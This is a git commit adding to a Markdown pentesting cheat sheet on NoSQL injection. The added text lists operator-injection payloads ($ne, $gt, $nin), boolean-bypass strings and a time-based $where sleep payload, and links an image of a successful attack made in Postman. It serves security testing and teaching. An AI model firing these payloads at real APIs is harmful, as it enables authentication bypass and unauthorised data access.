Update NoSQL Injection.md

2024-07-27 08:47:26 +03:30 · 2024-07-27 08:47:26 +03:30 · a5b4f9d94f
commit a5b4f9d94f
parent 033a4d2cbe
1 changed files with 28 additions and 0 deletions
--- a/Injection.md
+++ b/Injection.md
@ -1,5 +1,33 @@
 # NoSQL Injection
+
+
 ## Exploit
+* The following are common NoSQL metacharacters you could send in an API call to manipulate the database:
+```bash
+$gt
+{"$gt":""}
+{"$gt":-1}
+$ne
+{"$ne":""}
+{"$ne":-1}
+$nin
+{"$nin":1}
+{"$nin":[1]}
+|| '1'=='1
+//
+||'a'\\'a
+'||'1'=='1';//
+'/{}:
+'"\;{}
+'"\/$[].>
+{"$where": "sleep(1000)"}
+```
+
+* **Successful NoSQL injection attack using Postman:**
+![nosql](https://github.com/user-attachments/assets/3dd58830-ea8e-4444-b518-0889951a4779)
+
+
+
 **PHP**

 The exploits are based in adding an Operator